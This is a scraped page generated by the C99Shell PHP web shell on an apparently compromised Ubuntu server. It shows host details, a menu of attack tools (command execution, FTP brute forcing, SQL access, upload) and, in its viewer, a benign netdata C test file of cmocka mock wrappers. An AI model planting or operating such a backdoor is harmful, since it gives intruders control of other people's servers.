!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/netdata/exporting/tests/   drwxr-xr-x
Free 13.33 GB of 57.97 GB (23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     system_doubles.c (1.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// SPDX-License-Identifier: GPL-3.0-or-later

#include "test_exporting_engine.h"

void __wrap_uv_thread_create(uv_thread_t thread, void (*worker)(void *arg), void *arg)
{
    function_called();

    check_expected_ptr(thread);
    check_expected_ptr(worker);
    check_expected_ptr(arg);
}

void __wrap_uv_mutex_lock(uv_mutex_t *mutex)
{
    (void)mutex;
}

void __wrap_uv_mutex_unlock(uv_mutex_t *mutex)
{
    (void)mutex;
}

void __wrap_uv_cond_signal(uv_cond_t *cond_var)
{
    (void)cond_var;
}

void __wrap_uv_cond_wait(uv_cond_t *cond_var, uv_mutex_t *mutex)
{
    (void)cond_var;
    (void)mutex;
}

ssize_t __wrap_recv(int sockfd, void *buf, size_t len, int flags)
{
    function_called();

    check_expected(sockfd);
    check_expected_ptr(buf);
    check_expected(len);
    check_expected(flags);

    char *mock_string = "Test recv";
    strcpy(buf, mock_string);

    return strlen(mock_string);
}

ssize_t __wrap_send(int sockfd, const void *buf, size_t len, int flags)
{
    function_called();

    check_expected(sockfd);
    check_expected_ptr(buf);
    check_expected_ptr(buf);
    check_expected(len);
    check_expected(flags);

    return strlen(buf);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0382 ]--